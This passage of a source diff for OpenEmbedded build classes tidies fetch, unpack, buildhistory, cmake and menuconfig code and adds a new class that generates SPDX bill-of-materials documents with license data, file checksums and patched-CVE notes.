137 # /usr/bin/gcc, this code can check and fix that. 141 # /usr/bin/gcc, this code can check and fix that.
138 if "ccache" in srctool: 142 if os.path.islink(srctool) and os.path.basename(os.readlink(srctool)) == 'ccache':
139 srctool = bb.utils.which(path, tool, executable=True, direction=1) 143 srctool = bb.utils.which(path, tool, executable=True, direction=1)
140 if srctool: 144 if srctool:
141 os.symlink(srctool, desttool) 145 os.symlink(srctool, desttool)
@@ -153,14 +157,14 @@ do_fetch[vardeps] += "SRCREV"
153python base_do_fetch() { 157python base_do_fetch() {
154 158
155 src_uri = (d.getVar('SRC_URI') or "").split() 159 src_uri = (d.getVar('SRC_URI') or "").split()
156 if len(src_uri) == 0: 160 if not src_uri:
157 return 161 return
158 162
159 try: 163 try:
160 fetcher = bb.fetch2.Fetch(src_uri, d) 164 fetcher = bb.fetch2.Fetch(src_uri, d)
161 fetcher.download() 165 fetcher.download()
162 except bb.fetch2.BBFetchException as e: 166 except bb.fetch2.BBFetchException as e:
163 bb.fatal(str(e)) 167 bb.fatal("Bitbake Fetcher Error: " + repr(e))
164} 168}
165 169
166addtask unpack after do_fetch 170addtask unpack after do_fetch
@@ -170,14 +174,14 @@ do_unpack[cleandirs] = "${@d.getVar('S') if os.path.normpath(d.getVar('S')) != o
170 174
171python base_do_unpack() { 175python base_do_unpack() {
172 src_uri = (d.getVar('SRC_URI') or "").split() 176 src_uri = (d.getVar('SRC_URI') or "").split()
173 if len(src_uri) == 0: 177 if not src_uri:
174 return 178 return
175 179
176 try: 180 try:
177 fetcher = bb.fetch2.Fetch(src_uri, d) 181 fetcher = bb.fetch2.Fetch(src_uri, d)
178 fetcher.unpack(d.getVar('WORKDIR')) 182 fetcher.unpack(d.getVar('WORKDIR'))
179 except bb.fetch2.BBFetchException as e: 183 except bb.fetch2.BBFetchException as e:
180 bb.fatal(str(e)) 184 bb.fatal("Bitbake Fetcher Error: " + repr(e))
181} 185}
182 186
183def get_layers_branch_rev(d): 187def get_layers_branch_rev(d):
@@ -688,7 +692,7 @@ python () {
688 if os.path.basename(p) == machine and os.path.isdir(p): 692 if os.path.basename(p) == machine and os.path.isdir(p):
689 paths.append(p) 693 paths.append(p)
690 694
691 if len(paths) != 0: 695 if paths:
692 for s in srcuri.split(): 696 for s in srcuri.split():
693 if not s.startswith("file://"): 697 if not s.startswith("file://"):
694 continue 698 continue
@@ -721,7 +725,7 @@ do_cleansstate[nostamp] = "1"
721 725
722python do_cleanall() { 726python do_cleanall() {
723 src_uri = (d.getVar('SRC_URI') or "").split() 727 src_uri = (d.getVar('SRC_URI') or "").split()
724 if len(src_uri) == 0: 728 if not src_uri:
725 return 729 return
726 730
727 try: 731 try:
diff --git a/meta/classes/bin_package.bbclass b/meta/classes/bin_package.bbclass
index cbc9b1fa13..c1954243ee 100644
--- a/meta/classes/bin_package.bbclass
+++ b/meta/classes/bin_package.bbclass
@@ -30,8 +30,9 @@ bin_package_do_install () {
30 bbfatal bin_package has nothing to install. Be sure the SRC_URI unpacks into S. 30 bbfatal bin_package has nothing to install. Be sure the SRC_URI unpacks into S.
31 fi 31 fi
32 cd ${S} 32 cd ${S}
33 install -d ${D}${base_prefix}
33 tar --no-same-owner --exclude='./patches' --exclude='./.pc' -cpf - . \ 34 tar --no-same-owner --exclude='./patches' --exclude='./.pc' -cpf - . \
34 | tar --no-same-owner -xpf - -C ${D} 35 | tar --no-same-owner -xpf - -C ${D}${base_prefix}
35} 36}
36 37
37FILES_${PN} = "/" 38FILES_${PN} = "/"
diff --git a/meta/classes/buildhistory.bbclass b/meta/classes/buildhistory.bbclass
index 8a1359acbe..6a1a20653a 100644
--- a/meta/classes/buildhistory.bbclass
+++ b/meta/classes/buildhistory.bbclass
@@ -671,13 +671,16 @@ IMAGE_POSTPROCESS_COMMAND[vardepsexclude] += "buildhistory_get_imageinfo"
671POPULATE_SDK_POST_TARGET_COMMAND_append = " buildhistory_list_installed_sdk_target;" 671POPULATE_SDK_POST_TARGET_COMMAND_append = " buildhistory_list_installed_sdk_target;"
672POPULATE_SDK_POST_TARGET_COMMAND_append = " buildhistory_get_sdk_installed_target;" 672POPULATE_SDK_POST_TARGET_COMMAND_append = " buildhistory_get_sdk_installed_target;"
673POPULATE_SDK_POST_TARGET_COMMAND[vardepvalueexclude] .= "| buildhistory_list_installed_sdk_target;| buildhistory_get_sdk_installed_target;" 673POPULATE_SDK_POST_TARGET_COMMAND[vardepvalueexclude] .= "| buildhistory_list_installed_sdk_target;| buildhistory_get_sdk_installed_target;"
674POPULATE_SDK_POST_TARGET_COMMAND[vardepsexclude] += "buildhistory_list_installed_sdk_target buildhistory_get_sdk_installed_target"
674 675
675POPULATE_SDK_POST_HOST_COMMAND_append = " buildhistory_list_installed_sdk_host;" 676POPULATE_SDK_POST_HOST_COMMAND_append = " buildhistory_list_installed_sdk_host;"
676POPULATE_SDK_POST_HOST_COMMAND_append = " buildhistory_get_sdk_installed_host;" 677POPULATE_SDK_POST_HOST_COMMAND_append = " buildhistory_get_sdk_installed_host;"
677POPULATE_SDK_POST_HOST_COMMAND[vardepvalueexclude] .= "| buildhistory_list_installed_sdk_host;| buildhistory_get_sdk_installed_host;" 678POPULATE_SDK_POST_HOST_COMMAND[vardepvalueexclude] .= "| buildhistory_list_installed_sdk_host;| buildhistory_get_sdk_installed_host;"
679POPULATE_SDK_POST_HOST_COMMAND[vardepsexclude] += "buildhistory_list_installed_sdk_host buildhistory_get_sdk_installed_host"
678 680
679SDK_POSTPROCESS_COMMAND_append = " buildhistory_get_sdkinfo ; buildhistory_get_extra_sdkinfo; " 681SDK_POSTPROCESS_COMMAND_append = " buildhistory_get_sdkinfo ; buildhistory_get_extra_sdkinfo; "
680SDK_POSTPROCESS_COMMAND[vardepvalueexclude] .= "| buildhistory_get_sdkinfo ; buildhistory_get_extra_sdkinfo; " 682SDK_POSTPROCESS_COMMAND[vardepvalueexclude] .= "| buildhistory_get_sdkinfo ; buildhistory_get_extra_sdkinfo; "
683SDK_POSTPROCESS_COMMAND[vardepsexclude] += "buildhistory_get_sdkinfo buildhistory_get_extra_sdkinfo"
681 684
682python buildhistory_write_sigs() { 685python buildhistory_write_sigs() {
683 if not "task" in (d.getVar('BUILDHISTORY_FEATURES') or "").split(): 686 if not "task" in (d.getVar('BUILDHISTORY_FEATURES') or "").split():
@@ -862,6 +865,7 @@ python buildhistory_eventhandler() {
862 if os.path.isdir(olddir): 865 if os.path.isdir(olddir):
863 shutil.rmtree(olddir) 866 shutil.rmtree(olddir)
864 rootdir = e.data.getVar("BUILDHISTORY_DIR") 867 rootdir = e.data.getVar("BUILDHISTORY_DIR")
868 bb.utils.mkdirhier(rootdir)
865 entries = [ x for x in os.listdir(rootdir) if not x.startswith('.') ] 869 entries = [ x for x in os.listdir(rootdir) if not x.startswith('.') ]
866 bb.utils.mkdirhier(olddir) 870 bb.utils.mkdirhier(olddir)
867 for entry in entries: 871 for entry in entries:
@@ -950,23 +954,19 @@ def write_latest_srcrev(d, pkghistdir):
950 value = value.replace('"', '').strip() 954 value = value.replace('"', '').strip()
951 old_tag_srcrevs[key] = value 955 old_tag_srcrevs[key] = value
952 with open(srcrevfile, 'w') as f: 956 with open(srcrevfile, 'w') as f:
953 orig_srcrev = d.getVar('SRCREV', False) or 'INVALID' 957 for name, srcrev in sorted(srcrevs.items()):
954 if orig_srcrev != 'INVALID': 958 suffix = "_" + name
955 f.write('# SRCREV = "%s"\n' % orig_srcrev) 959 if name == "default":
956 if len(srcrevs) > 1: 960 suffix = ""
957 for name, srcrev in sorted(srcrevs.items()): 961 orig_srcrev = d.getVar('SRCREV%s' % suffix, False)
958 orig_srcrev = d.getVar('SRCREV_%s' % name, False) 962 if orig_srcrev:
959 if orig_srcrev: 963 f.write('# SRCREV%s = "%s"\n' % (suffix, orig_srcrev))
960 f.write('# SRCREV_%s = "%s"\n' % (name, orig_srcrev)) 964 f.write('SRCREV%s = "%s"\n' % (suffix, srcrev))
961 f.write('SRCREV_%s = "%s"\n' % (name, srcrev)) 965 for name, srcrev in sorted(tag_srcrevs.items()):
962 else: 966 f.write('# tag_%s = "%s"\n' % (name, srcrev))
963 f.write('SRCREV = "%s"\n' % next(iter(srcrevs.values()))) 967 if name in old_tag_srcrevs and old_tag_srcrevs[name] != srcrev:
964 if len(tag_srcrevs) > 0: 968 pkg = d.getVar('PN')
965 for name, srcrev in sorted(tag_srcrevs.items()): 969 bb.warn("Revision for tag %s in package %s was changed since last build (from %s to %s)" % (name, pkg, old_tag_srcrevs[name], srcrev))
966 f.write('# tag_%s = "%s"\n' % (name, srcrev))
967 if name in old_tag_srcrevs and old_tag_srcrevs[name] != srcrev:
968 pkg = d.getVar('PN')
969 bb.warn("Revision for tag %s in package %s was changed since last build (from %s to %s)" % (name, pkg, old_tag_srcrevs[name], srcrev))
970 970
971 else: 971 else:
972 if os.path.exists(srcrevfile): 972 if os.path.exists(srcrevfile):
diff --git a/meta/classes/cmake.bbclass b/meta/classes/cmake.bbclass
index 8243f7ce8c..af6a8c4395 100644
--- a/meta/classes/cmake.bbclass
+++ b/meta/classes/cmake.bbclass
@@ -102,7 +102,8 @@ set( CMAKE_CXX_COMPILER ${OECMAKE_CXX_COMPILER} )
102set( CMAKE_C_COMPILER_LAUNCHER ${OECMAKE_C_COMPILER_LAUNCHER} ) 102set( CMAKE_C_COMPILER_LAUNCHER ${OECMAKE_C_COMPILER_LAUNCHER} )
103set( CMAKE_CXX_COMPILER_LAUNCHER ${OECMAKE_CXX_COMPILER_LAUNCHER} ) 103set( CMAKE_CXX_COMPILER_LAUNCHER ${OECMAKE_CXX_COMPILER_LAUNCHER} )
104set( CMAKE_ASM_COMPILER ${OECMAKE_C_COMPILER} ) 104set( CMAKE_ASM_COMPILER ${OECMAKE_C_COMPILER} )
105set( CMAKE_AR ${OECMAKE_AR} CACHE FILEPATH "Archiver" ) 105find_program( CMAKE_AR ${OECMAKE_AR} DOC "Archiver" REQUIRED )
106
106set( CMAKE_C_FLAGS "${OECMAKE_C_FLAGS}" CACHE STRING "CFLAGS" ) 107set( CMAKE_C_FLAGS "${OECMAKE_C_FLAGS}" CACHE STRING "CFLAGS" )
107set( CMAKE_CXX_FLAGS "${OECMAKE_CXX_FLAGS}" CACHE STRING "CXXFLAGS" ) 108set( CMAKE_CXX_FLAGS "${OECMAKE_CXX_FLAGS}" CACHE STRING "CXXFLAGS" )
108set( CMAKE_ASM_FLAGS "${OECMAKE_C_FLAGS}" CACHE STRING "ASM FLAGS" ) 109set( CMAKE_ASM_FLAGS "${OECMAKE_C_FLAGS}" CACHE STRING "ASM FLAGS" )
diff --git a/meta/classes/cml1.bbclass b/meta/classes/cml1.bbclass
index 8ab240589a..46a19fce32 100644
--- a/meta/classes/cml1.bbclass
+++ b/meta/classes/cml1.bbclass
@@ -36,6 +36,14 @@ python do_menuconfig() {
36 except OSError: 36 except OSError:
37 mtime = 0 37 mtime = 0
38 38
39 # setup native pkg-config variables (kconfig scripts call pkg-config directly, cannot generically be overriden to pkg-config-native)
40 d.setVar("PKG_CONFIG_DIR", "${STAGING_DIR_NATIVE}${libdir_native}/pkgconfig")
41 d.setVar("PKG_CONFIG_PATH", "${PKG_CONFIG_DIR}:${STAGING_DATADIR_NATIVE}/pkgconfig")
42 d.setVar("PKG_CONFIG_LIBDIR", "${PKG_CONFIG_DIR}")
43 d.setVarFlag("PKG_CONFIG_SYSROOT_DIR", "unexport", "1")
44 # ensure that environment variables are overwritten with this tasks 'd' values
45 d.appendVar("OE_TERMINAL_EXPORTS", " PKG_CONFIG_DIR PKG_CONFIG_PATH PKG_CONFIG_LIBDIR PKG_CONFIG_SYSROOT_DIR")
46
39 oe_terminal("sh -c \"make %s; if [ \\$? -ne 0 ]; then echo 'Command failed.'; printf 'Press any key to continue... '; read r; fi\"" % d.getVar('KCONFIG_CONFIG_COMMAND'), 47 oe_terminal("sh -c \"make %s; if [ \\$? -ne 0 ]; then echo 'Command failed.'; printf 'Press any key to continue... '; read r; fi\"" % d.getVar('KCONFIG_CONFIG_COMMAND'),
40 d.getVar('PN') + ' Configuration', d) 48 d.getVar('PN') + ' Configuration', d)
41 49
diff --git a/meta/classes/create-spdx-2.2.bbclass b/meta/classes/create-spdx-2.2.bbclass
new file mode 100644
index 0000000000..42b693d586
--- /dev/null
+++ b/meta/classes/create-spdx-2.2.bbclass
@@ -0,0 +1,1067 @@
1#
2# Copyright OpenEmbedded Contributors
3#
4# SPDX-License-Identifier: GPL-2.0-only
5#
6
7DEPLOY_DIR_SPDX ??= "${DEPLOY_DIR}/spdx/${MACHINE}"
8
9# The product name that the CVE database uses. Defaults to BPN, but may need to
10# be overriden per recipe (for example tiff.bb sets CVE_PRODUCT=libtiff).
11CVE_PRODUCT ??= "${BPN}"
12CVE_VERSION ??= "${PV}"
13
14SPDXDIR ??= "${WORKDIR}/spdx"
15SPDXDEPLOY = "${SPDXDIR}/deploy"
16SPDXWORK = "${SPDXDIR}/work"
17SPDXIMAGEWORK = "${SPDXDIR}/image-work"
18SPDXSDKWORK = "${SPDXDIR}/sdk-work"
19
20SPDX_TOOL_NAME ??= "oe-spdx-creator"
21SPDX_TOOL_VERSION ??= "1.0"
22
23SPDXRUNTIMEDEPLOY = "${SPDXDIR}/runtime-deploy"
24
25SPDX_INCLUDE_SOURCES ??= "0"
26SPDX_ARCHIVE_SOURCES ??= "0"
27SPDX_ARCHIVE_PACKAGED ??= "0"
28
29SPDX_UUID_NAMESPACE ??= "sbom.openembedded.org"
30SPDX_NAMESPACE_PREFIX ??= "http://spdx.org/spdxdoc"
31SPDX_PRETTY ??= "0"
32
33SPDX_LICENSES ??= "${COREBASE}/meta/files/spdx-licenses.json"
34
35SPDX_CUSTOM_ANNOTATION_VARS ??= ""
36
37SPDX_ORG ??= "OpenEmbedded ()"
38SPDX_SUPPLIER ??= "Organization: ${SPDX_ORG}"
39SPDX_SUPPLIER[doc] = "The SPDX PackageSupplier field for SPDX packages created from \
40 this recipe. For SPDX documents create using this class during the build, this \
41 is the contact information for the person or organization who is doing the \
42 build."
43
44def extract_licenses(filename):
45 import re
46
47 lic_regex = re.compile(rb'^\W*SPDX-License-Identifier:\s*([ \w\d.()+-]+?)(?:\s+\W*)?$', re.MULTILINE)
48
49 try:
50 with open(filename, 'rb') as f:
51 size = min(15000, os.stat(filename).st_size)
52 txt = f.read(size)
53 licenses = re.findall(lic_regex, txt)
54 if licenses:
55 ascii_licenses = [lic.decode('ascii') for lic in licenses]
56 return ascii_licenses
57 except Exception as e:
58 bb.warn(f"Exception reading {filename}: {e}")
59 return None
60
61def get_doc_namespace(d, doc):
62 import uuid
63 namespace_uuid = uuid.uuid5(uuid.NAMESPACE_DNS, d.getVar("SPDX_UUID_NAMESPACE"))
64 return "%s/%s-%s" % (d.getVar("SPDX_NAMESPACE_PREFIX"), doc.name, str(uuid.uuid5(namespace_uuid, doc.name)))
65
66def create_annotation(d, comment):
67 from datetime import datetime, timezone
68
69 creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
70 annotation = oe.spdx.SPDXAnnotation()
71 annotation.annotationDate = creation_time
72 annotation.annotationType = "OTHER"
73 annotation.annotator = "Tool: %s - %s" % (d.getVar("SPDX_TOOL_NAME"), d.getVar("SPDX_TOOL_VERSION"))
74 annotation.comment = comment
75 return annotation
76
77def recipe_spdx_is_native(d, recipe):
78 return any(a.annotationType == "OTHER" and
79 a.annotator == "Tool: %s - %s" % (d.getVar("SPDX_TOOL_NAME"), d.getVar("SPDX_TOOL_VERSION")) and
80 a.comment == "isNative" for a in recipe.annotations)
81
82def is_work_shared_spdx(d):
83 return bb.data.inherits_class('kernel', d) or ('work-shared' in d.getVar('WORKDIR'))
84
85def get_json_indent(d):
86 if d.getVar("SPDX_PRETTY") == "1":
87 return 2
88 return None
89
90python() {
91 import json
92 if d.getVar("SPDX_LICENSE_DATA"):
93 return
94
95 with open(d.getVar("SPDX_LICENSES"), "r") as f:
96 data = json.load(f)
97 # Transform the license array to a dictionary
98 data["licenses"] = {l["licenseId"]: l for l in data["licenses"]}
99 d.setVar("SPDX_LICENSE_DATA", data)
100}
101
102def convert_license_to_spdx(lic, document, d, existing={}):
103 from pathlib import Path
104 import oe.spdx
105
106 license_data = d.getVar("SPDX_LICENSE_DATA")
107 extracted = {}
108
109 def add_extracted_license(ident, name):
110 nonlocal document
111
112 if name in extracted:
113 return
114
115 extracted_info = oe.spdx.SPDXExtractedLicensingInfo()
116 extracted_info.name = name
117 extracted_info.licenseId = ident
118 extracted_info.extractedText = None
119
120 if name == "PD":
121 # Special-case this.
122 extracted_info.extractedText = "Software released to the public domain"
123 else:
124 # Seach for the license in COMMON_LICENSE_DIR and LICENSE_PATH
125 for directory in [d.getVar('COMMON_LICENSE_DIR')] + (d.getVar('LICENSE_PATH') or '').split():
126 try:
127 with (Path(directory) / name).open(errors="replace") as f:
128 extracted_info.extractedText = f.read()
129 break
130 except FileNotFoundError:
131 pass
132 if extracted_info.extractedText is None:
133 # If it's not SPDX or PD, then NO_GENERIC_LICENSE must be set
134 filename = d.getVarFlag('NO_GENERIC_LICENSE', name)
135 if filename:
136 filename = d.expand("${S}/" + filename)
137 with open(filename, errors="replace") as f:
138 extracted_info.extractedText = f.read()
139 else:
140 bb.error("Cannot find any text for license %s" % name)
141
142 extracted[name] = extracted_info
143 document.hasExtractedLicensingInfos.append(extracted_info)
144
145 def convert(l):
146 if l == "(" or l == ")":
147 return l
148
149 if l == "&":
150 return "AND"
151
152 if l == "|":
153 return "OR"
154
155 if l == "CLOSED":
156 return "NONE"
157
158 spdx_license = d.getVarFlag("SPDXLICENSEMAP", l) or l
159 if spdx_license in license_data["licenses"]:
160 return spdx_license
161
162 try:
163 spdx_license = existing[l]
164 except KeyError:
165 spdx_license = "LicenseRef-" + l
166 add_extracted_license(spdx_license, l)
167
168 return spdx_license
169
170 lic_split = lic.replace("(", " ( ").replace(")", " ) ").split()
171
172 return ' '.join(convert(l) for l in lic_split)
173
174def process_sources(d):
175 pn = d.getVar('PN')
176 assume_provided = (d.getVar("ASSUME_PROVIDED") or "").split()
177 if pn in assume_provided:
178 for p in d.getVar("PROVIDES").split():
179 if p != pn:
180 pn = p
181 break
182
183 # glibc-locale: do_fetch, do_unpack and do_patch tasks have been deleted,
184 # so avoid archiving source here.
185 if pn.startswith('glibc-locale'):
186 return False
187 if d.getVar('PN') == "libtool-cross":
188 return False
189 if d.getVar('PN') == "libgcc-initial":
190 return False
191 if d.getVar('PN') == "shadow-sysroot":
192 return False
193
194 # We just archive gcc-source for all the gcc related recipes
195 if d.getVar('BPN') in ['gcc', 'libgcc']:
196 bb.debug(1, 'spdx: There is bug in scan of %s is, do nothing' % pn)
197 return False
198
199 return True
200
201
202def add_package_files(d, doc, spdx_pkg, topdir, get_spdxid, get_types, *, archive=None, ignore_dirs=[], ignore_top_level_dirs=[]):
203 from pathlib import Path
204 import oe.spdx
205 import hashlib
206
207 source_date_epoch = d.getVar("SOURCE_DATE_EPOCH")
208 if source_date_epoch:
209 source_date_epoch = int(source_date_epoch)
210
211 sha1s = []
212 spdx_files = []
213
214 file_counter = 1
215 for subdir, dirs, files in os.walk(topdir):
216 dirs[:] = [d for d in dirs if d not in ignore_dirs]
217 if subdir == str(topdir):
218 dirs[:] = [d for d in dirs if d not in ignore_top_level_dirs]
219
220 for file in files:
221 filepath = Path(subdir) / file
222 filename = str(filepath.relative_to(topdir))
223
224 if not filepath.is_symlink() and filepath.is_file():
225 spdx_file = oe.spdx.SPDXFile()
226 spdx_file.SPDXID = get_spdxid(file_counter)
227 for t in get_types(filepath):
228 spdx_file.fileTypes.append(t)
229 spdx_file.fileName = filename
230
231 if archive is not None:
232 with filepath.open("rb") as f:
233 info = archive.gettarinfo(fileobj=f)
234 info.name = filename
235 info.uid = 0
236 info.gid = 0
237 info.uname = "root"
238 info.gname = "root"
239
240 if source_date_epoch is not None and info.mtime > source_date_epoch:
241 info.mtime = source_date_epoch
242
243 archive.addfile(info, f)
244
245 sha1 = bb.utils.sha1_file(filepath)
246 sha1s.append(sha1)
247 spdx_file.checksums.append(oe.spdx.SPDXChecksum(
248 algorithm="SHA1",
249 checksumValue=sha1,
250 ))
251 spdx_file.checksums.append(oe.spdx.SPDXChecksum(
252 algorithm="SHA256",
253 checksumValue=bb.utils.sha256_file(filepath),
254 ))
255
256 if "SOURCE" in spdx_file.fileTypes:
257 extracted_lics = extract_licenses(filepath)
258 if extracted_lics:
259 spdx_file.licenseInfoInFiles = extracted_lics
260
261 doc.files.append(spdx_file)
262 doc.add_relationship(spdx_pkg, "CONTAINS", spdx_file)
263 spdx_pkg.hasFiles.append(spdx_file.SPDXID)
264
265 spdx_files.append(spdx_file)
266
267 file_counter += 1
268
269 sha1s.sort()
270 verifier = hashlib.sha1()
271 for v in sha1s:
272 verifier.update(v.encode("utf-8"))
273 spdx_pkg.packageVerificationCode.packageVerificationCodeValue = verifier.hexdigest()
274
275 return spdx_files
276
277
278def add_package_sources_from_debug(d, package_doc, spdx_package, package, package_files, sources):
279 from pathlib import Path
280 import hashlib
281 import oe.packagedata
282 import oe.spdx
283
284 debug_search_paths = [
285 Path(d.getVar('PKGD')),
286 Path(d.getVar('STAGING_DIR_TARGET')),
287 Path(d.getVar('STAGING_DIR_NATIVE')),
288 Path(d.getVar('STAGING_KERNEL_DIR')),
289 ]
290
291 pkg_data = oe.packagedata.read_subpkgdata_extended(package, d)
292
293 if pkg_data is None:
294 return
295
296 for file_path, file_data in pkg_data["files_info"].items():
297 if not "debugsrc" in file_data:
298 continue
299
300 for pkg_file in package_files:
301 if file_path.lstrip("/") == pkg_file.fileName.lstrip("/"):
302 break
303 else:
304 bb.fatal("No package file found for %s" % str(file_path))
305 continue
306
307 for debugsrc in file_data["debugsrc"]:
308 ref_id = "NOASSERTION"
309 for search in debug_search_paths:
310 if debugsrc.startswith("/usr/src/kernel"):
311 debugsrc_path = search / debugsrc.replace('/usr/src/kernel/', '')
312 else:
313 debugsrc_path = search / debugsrc.lstrip("/")
314 if not debugsrc_path.exists():
315 continue
316
317 file_sha256 = bb.utils.sha256_file(debugsrc_path)
318
319 if file_sha256 in sources:
320 source_file = sources[file_sha256]
321
322 doc_ref = package_doc.find_external_document_ref(source_file.doc.documentNamespace)
323 if doc_ref is None:
324 doc_ref = oe.spdx.SPDXExternalDocumentRef()
325 doc_ref.externalDocumentId = "DocumentRef-dependency-" + source_file.doc.name
326 doc_ref.spdxDocument = source_file.doc.documentNamespace
327 doc_ref.checksum.algorithm = "SHA1"
328 doc_ref.checksum.checksumValue = source_file.doc_sha1
329 package_doc.externalDocumentRefs.append(doc_ref)
330
331 ref_id = "%s:%s" % (doc_ref.externalDocumentId, source_file.file.SPDXID)
332 else:
333 bb.debug(1, "Debug source %s with SHA256 %s not found in any dependency" % (str(debugsrc_path), file_sha256))
334 break
335 else:
336 bb.debug(1, "Debug source %s not found" % debugsrc)
337
338 package_doc.add_relationship(pkg_file, "GENERATED_FROM", ref_id, comment=debugsrc)
339
340def collect_dep_recipes(d, doc, spdx_recipe):
341 from pathlib import Path
342 import oe.sbom
343 import oe.spdx
344
345 deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
346
347 dep_recipes = []
348 taskdepdata = d.getVar("BB_TASKDEPDATA", False)
349 deps = sorted(set(
350 dep[0] for dep in taskdepdata.values() if
351 dep[1] == "do_create_spdx" and dep[0] != d.getVar("PN")
352 ))
353 for dep_pn in deps:
354 dep_recipe_path = deploy_dir_spdx / "recipes" / ("recipe-%s.spdx.json" % dep_pn)
355
356 spdx_dep_doc, spdx_dep_sha1 = oe.sbom.read_doc(dep_recipe_path)
357
358 for pkg in spdx_dep_doc.packages:
359 if pkg.name == dep_pn:
360 spdx_dep_recipe = pkg
361 break
362 else:
363 continue
364
365 dep_recipes.append(oe.sbom.DepRecipe(spdx_dep_doc, spdx_dep_sha1, spdx_dep_recipe))
366
367 dep_recipe_ref = oe.spdx.SPDXExternalDocumentRef()
368 dep_recipe_ref.externalDocumentId = "DocumentRef-dependency-" + spdx_dep_doc.name
369 dep_recipe_ref.spdxDocument = spdx_dep_doc.documentNamespace
370 dep_recipe_ref.checksum.algorithm = "SHA1"
371 dep_recipe_ref.checksum.checksumValue = spdx_dep_sha1
372
373 doc.externalDocumentRefs.append(dep_recipe_ref)
374
375 doc.add_relationship(
376 "%s:%s" % (dep_recipe_ref.externalDocumentId, spdx_dep_recipe.SPDXID),
377 "BUILD_DEPENDENCY_OF",
378 spdx_recipe
379 )
380
381 return dep_recipes
382
383collect_dep_recipes[vardepsexclude] += "BB_TASKDEPDATA"
384collect_dep_recipes[vardeps] += "DEPENDS"
385
386def collect_dep_sources(d, dep_recipes):
387 import oe.sbom
388
389 sources = {}
390 for dep in dep_recipes:
391 # Don't collect sources from native recipes as they
392 # match non-native sources also.
393 if recipe_spdx_is_native(d, dep.recipe):
394 continue
395 recipe_files = set(dep.recipe.hasFiles)
396
397 for spdx_file in dep.doc.files:
398 if spdx_file.SPDXID not in recipe_files:
399 continue
400
401 if "SOURCE" in spdx_file.fileTypes:
402 for checksum in spdx_file.checksums:
403 if checksum.algorithm == "SHA256":
404 sources[checksum.checksumValue] = oe.sbom.DepSource(dep.doc, dep.doc_sha1, dep.recipe, spdx_file)
405 break
406
407 return sources
408
409def add_download_packages(d, doc, recipe):
410 import os.path
411 from bb.fetch2 import decodeurl, CHECKSUM_LIST
412 import bb.process
413 import oe.spdx
414 import oe.sbom
415
416 for download_idx, src_uri in enumerate(d.getVar('SRC_URI').split()):
417 f = bb.fetch2.FetchData(src_uri, d)
418
419 for name in f.names:
420 package = oe.spdx.SPDXPackage()
421 package.name = "%s-source-%d" % (d.getVar("PN"), download_idx + 1)
422 package.SPDXID = oe.sbom.get_download_spdxid(d, download_idx + 1)
423
424 if f.type == "file":
425 continue
426
427 uri = f.type
428 proto = getattr(f, "proto", None)
429 if proto is not None:
430 uri = uri + "+" + proto
431 uri = uri + "://" + f.host + f.path
432
433 if f.method.supports_srcrev():
434 uri = uri + "@" + f.revisions[name]
435
436 if f.method.supports_checksum(f):
437 for checksum_id in CHECKSUM_LIST:
438 if checksum_id.upper() not in oe.spdx.SPDXPackage.ALLOWED_CHECKSUMS:
439 continue
440
441 expected_checksum = getattr(f, "%s_expected" % checksum_id)
442 if expected_checksum is None:
443 continue
444
445 c = oe.spdx.SPDXChecksum()
446 c.algorithm = checksum_id.upper()
447 c.checksumValue = expected_checksum
448 package.checksums.append(c)
449
450 package.downloadLocation = uri
451 doc.packages.append(package)
452 doc.add_relationship(doc, "DESCRIBES", package)
453 # In the future, we might be able to do more fancy dependencies,
454 # but this should be sufficient for now
455 doc.add_relationship(package, "BUILD_DEPENDENCY_OF", recipe)
456
457python do_create_spdx() {
458 from datetime import datetime, timezone
459 import oe.sbom
460 import oe.spdx
461 import uuid
462 from pathlib import Path
463 from contextlib import contextmanager
464 import oe.cve_check
465
466 @contextmanager
467 def optional_tarfile(name, guard, mode="w"):
468 import tarfile
469 import gzip
470
471 if guard:
472 name.parent.mkdir(parents=True, exist_ok=True)
473 with gzip.open(name, mode=mode + "b") as f:
474 with tarfile.open(fileobj=f, mode=mode + "|") as tf:
475 yield tf
476 else:
477 yield None
478
479
480 deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
481 spdx_workdir = Path(d.getVar("SPDXWORK"))
482 include_sources = d.getVar("SPDX_INCLUDE_SOURCES") == "1"
483 archive_sources = d.getVar("SPDX_ARCHIVE_SOURCES") == "1"
484 archive_packaged = d.getVar("SPDX_ARCHIVE_PACKAGED") == "1"
485
486 creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
487
488 doc = oe.spdx.SPDXDocument()
489
490 doc.name = "recipe-" + d.getVar("PN")
491 doc.documentNamespace = get_doc_namespace(d, doc)
492 doc.creationInfo.created = creation_time
493 doc.creationInfo.comment = "This document was created by analyzing recipe files during the build."
494 doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
495 doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
496 doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
497 doc.creationInfo.creators.append("Person: N/A ()")
498
499 recipe = oe.spdx.SPDXPackage()
500 recipe.name = d.getVar("PN")
501 recipe.versionInfo = d.getVar("PV")
502 recipe.SPDXID = oe.sbom.get_recipe_spdxid(d)
503 recipe.supplier = d.getVar("SPDX_SUPPLIER")
504 if bb.data.inherits_class("native", d) or bb.data.inherits_class("cross", d):
505 recipe.annotations.append(create_annotation(d, "isNative"))
506
507 homepage = d.getVar("HOMEPAGE")
508 if homepage:
509 recipe.homepage = homepage
510
511 license = d.getVar("LICENSE")
512 if license:
513 recipe.licenseDeclared = convert_license_to_spdx(license, doc, d)
514
515 summary = d.getVar("SUMMARY")
516 if summary:
517 recipe.summary = summary
518
519 description = d.getVar("DESCRIPTION")
520 if description:
521 recipe.description = description
522
523 if d.getVar("SPDX_CUSTOM_ANNOTATION_VARS"):
524 for var in d.getVar('SPDX_CUSTOM_ANNOTATION_VARS').split():
525 recipe.annotations.append(create_annotation(d, var + "=" + d.getVar(var)))
526
527 # Some CVEs may be patched during the build process without incrementing the version number,
528 # so querying for CVEs based on the CPE id can lead to false positives. To account for this,
529 # save the CVEs fixed by patches to source information field in the SPDX.
530 patched_cves = oe.cve_check.get_patched_cves(d)
531 patched_cves = list(patched_cves)
532 patched_cves = ' '.join(patched_cves)
533 if patched_cves:
534 recipe.sourceInfo = "CVEs fixed: " + patched_cves
535
